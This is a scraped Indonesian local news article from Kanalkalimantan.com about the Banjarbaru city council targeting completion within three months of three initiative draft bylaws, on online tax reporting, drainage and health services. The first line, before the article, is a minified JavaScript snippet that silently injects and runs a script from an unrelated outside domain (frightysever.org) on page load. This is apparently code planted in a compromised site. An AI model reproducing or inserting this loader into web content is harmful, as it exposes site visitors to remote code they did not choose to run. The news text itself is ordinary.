(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD BANJARBARU

DPRD Banjarbaru Target Tiga Raperda Inisiatif Selesai Dalam Tiga Bulan


KANALKALIMANTAN.COM, BANJARBARU – Tiga buah Rancangan Peraturan Daerah (Raperda) inisiatif ditargetkan selesai dalam waktu tiga bulan ke depan oleh Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru.

DPRD Banjarbaru menggelar rapat paripurna dengan agenda penyampaian tiga Raperda inisiatif di graha paripurna gedung DPRD Banjarbaru, Selasa (30/4/2024) siang.

Tiga buah Raperda inisiatif ini ditujukan kepada sejumlah SKPD di lingkup Pemerintah Kota Banjarbaru.

Baca juga: Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

Ketua DPRD Kota Banjarbaru, Fadliansyah Akbar. Foto : wanda

Ketua DPRD Kota Banjarbaru, Fadliansyah Akbar menyebutkan salah satu Raperda adalah berkaitan dengan sistem pelaporan pajak retribusi daerah.

Fadliansyah menekankan agar seluruh pelaku usaha di Kota Banjarbaru segala hal yang berkaitan dengan retribusi daerah bisa dipungut menggunakan teknologi dengan sistem online

“Kita sampaikan agar pelaporan pajak retribusi daerah memakai sistem online sehingga transparan, bisa terdeteksi dengan sistem jadi tidak ada lagi manual, saya harapkan begitu,” ujar Ketua DPRD Kota Banjarbaru.

DPRD Banjarbaru juga meminta kepada Kepala BPPRD (Badan Pengelolaan Pajak dan Retribusi Daerah) Kota Banjarbaru untuk menyesuaikan mana saja pajak yang bisa diterapkan menggunakan sistem online.

Baca juga: Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

Terutama sambungnya seperti pajak makanan, pajak parkir, restroran, hotel, hingga pajak hiburan.

“Itu yang kita godok di dalam sistem pelaporan pajak agar pertama meminimalisir kebocoran PAD kita, kemudian bisa melihat transparansi masyarakat dalam membayar pajak,” sebut dia.

Raperda inisiatif yang diajukan dewan mengenai sistem pelayanan drainase yang ada di Kota Banjarbaru.

Yang mana, dikatakan Fadliansyah, Raperda sistem drainase berkaitan penting dengan mitigasi bencana banjir di ibu kota Kalimantan Selatan.

“Saya harapkan kegiatan mitigasi banjir dengan adanya Raperda sistem drainase bisa saling berkesinambungan,” ungkapnya.

Baca juga: Kadis Pariwisata Tala dan Bendahara Disidang Kasus Korupsi Retribusi Asuransi Wisata

Kemudian Raperda inisiatif ketiga yang diajukan yakni terkait pelayanan kesehatan. Sesuai dengan Undang-Undang, dikatakan, Raperda pelayanan kesehatan diharapkan menjadi payung hukum bagi penyelenggara kesehatan di Kota Banjarbaru.

“Baik itu untuk rumah sakit swasta maupun rumah sakit pemerintah agar mengatur terkait pelayanan kesehatan,” sambung dia.

Lebih lanjut, dijelaskan Fadliansyah, Raperda pelayanan kesehatan telah melalui tahapan-tahapan pembahasan oleh Bappemperda, forum grup diskusi hingga dalam rapat masing-masing panitia khusus (Pansus).

Dirinya optimis dalam tiga bulan ke depan, tiga Raperda inisiatif DPRD Banjarbaru dapat segera terselesaikan.

“Saya targetkan sekitar tiga bulan ini Raperda sudah selesai,” tuntas dia. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

4 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

5 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

5 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

5 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

9 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

11 jam ago

This website uses cookies.